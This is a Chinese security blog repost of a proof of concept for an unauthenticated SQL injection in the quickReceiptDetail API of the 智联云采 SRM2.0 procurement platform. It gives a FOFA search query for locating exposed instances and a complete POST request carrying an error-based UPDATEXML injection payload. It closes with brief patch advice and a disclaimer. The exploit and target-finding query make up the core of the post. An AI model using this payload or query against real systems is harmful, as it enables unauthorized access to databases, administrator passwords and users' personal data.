智联云采 SRM2.0 quickReceiptDetail SQL注入漏洞 Poc

2024年12月3日12:22:45评论13 views字数 933阅读3分6秒阅读模式

产品简介

智联云采是一款针对企业供应链管理难题及智能化转型升级需求而设计的解决方案，针对企业供应链管理难题，及智能化转型升级需求，智联云采依托人工智能、物联网、大数据、云等技术，通过软硬件系统化方案，帮助企业实现供应商关系管理和采购线上化、移动化、智能化，提升采购和协同效率，进而规避供需风险，强化供应链整合能力，构建企业利益共同体。

漏洞概述

由于智联云采 SRM2.0 quickReceiptDetail 接口可未授权执行SQL语句，存在极大的安全风险，未经身份验证的远程攻击者除了可以利用此漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

搜索引擎

FOFA:

title=="SRM 2.0"

智联云采 SRM2.0 quickReceiptDetail SQL注入漏洞 Poc

漏洞复现

POST /adpweb/api/srm/delivery/quickReceiptDetail?orderBy=%28UPDATEXML%288058%2CCONCAT%280x2e%2C0x71707a7671%2C%28SELECT+%28ELT%288058%3D8058%2C1%29%29%29%2C0x71766a7671%29%2C3521%29%29 HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: keep-alive

sqlmap验证

检测工具

nuclei

afrog

xray

修复建议

1、关闭互联网暴露面或接口设置访问权限

2、关注厂商及时更新补丁或升级至安全版本

原文始发于微信公众号（nday POC）：智联云采 SRM2.0 quickReceiptDetail SQL注入漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

智联云采 SRM2.0 quickReceiptDetail SQL注入漏洞 Poc

复现完毕 | Apache Tomcat远程代码执行，内含脚本（CVE-2025-24813）

VMware ESXi任意写入漏洞

Kibana原型污染漏洞

Apache Tomcat 远程代码执行漏洞(CVE-2025-24813)

Apache OFBiz服务端模板注入漏洞(CVE-2025-26865)

EasyCVR视频管理平台信息泄露漏洞

H3CWeb网管登录系统jQuery-1.7.2存在任意文件读取 POC

H3CWeb网管登录系统aaa_portal_auth_wchat_submit存在远程命令执行漏洞 POC

CVE-2023-21839-WebLogic Server远程代码执行

Tomcat抽象之旅

发表评论

在线咨询

微信